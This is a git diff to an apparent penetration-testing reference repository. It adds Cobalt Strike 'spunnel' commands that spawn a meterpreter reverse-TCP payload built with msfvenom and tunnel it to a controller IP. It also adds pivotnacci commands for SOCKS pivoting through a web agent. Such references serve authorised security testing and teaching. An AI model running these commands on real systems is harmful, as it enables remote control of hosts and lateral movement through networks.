diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md index f8975eb2..07742da3 100644 --- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md +++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md @@ -390,6 +390,14 @@ beacon > browserpivot [pid] [x86|x64] # Bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port. beacon > rportfwd [bind port] [forward host] [forward port] + +# spunnel : Spawn an agent and create a reverse port forward tunnel to its controller. ~= rportfwd + shspawn. +msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin +beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin + +# spunnel_local: Spawn an agent and create a reverse port forward, tunnelled through your Cobalt Strike client, to its controller +# then you can handle the connect back on your MSF multi handler +beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin ``` ## Kits diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 09285a3d..670fae33 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -10,6 +10,7 @@ * [Proxychains](#proxychains) * [Graphtcp](#graphtcp) * [Web SOCKS - reGeorg](#web-socks---regeorg) +* [Web SOCKS - pivotnacci](#web-socks---pivotnacci) * [Metasploit](#metasploit) * [sshuttle](#sshuttle) * [chisel](#chisel) @@ -118,6 +119,17 @@ optional arguments: -v , --verbose Verbose output[INFO|DEBUG] ``` +## Web SOCKS - pivotnacci + +[pivotnacci](https://github.com/blackarrowsec/pivotnacci), a tool to make socks connections through HTTP agents. + +```powershell +pip3 install pivotnacci +pivotnacci https://domain.com/agent.php --password "s3cr3t" +pivotnacci https://domain.com/agent.php --polling-interval 2000 +``` + + ## Metasploit ```powershell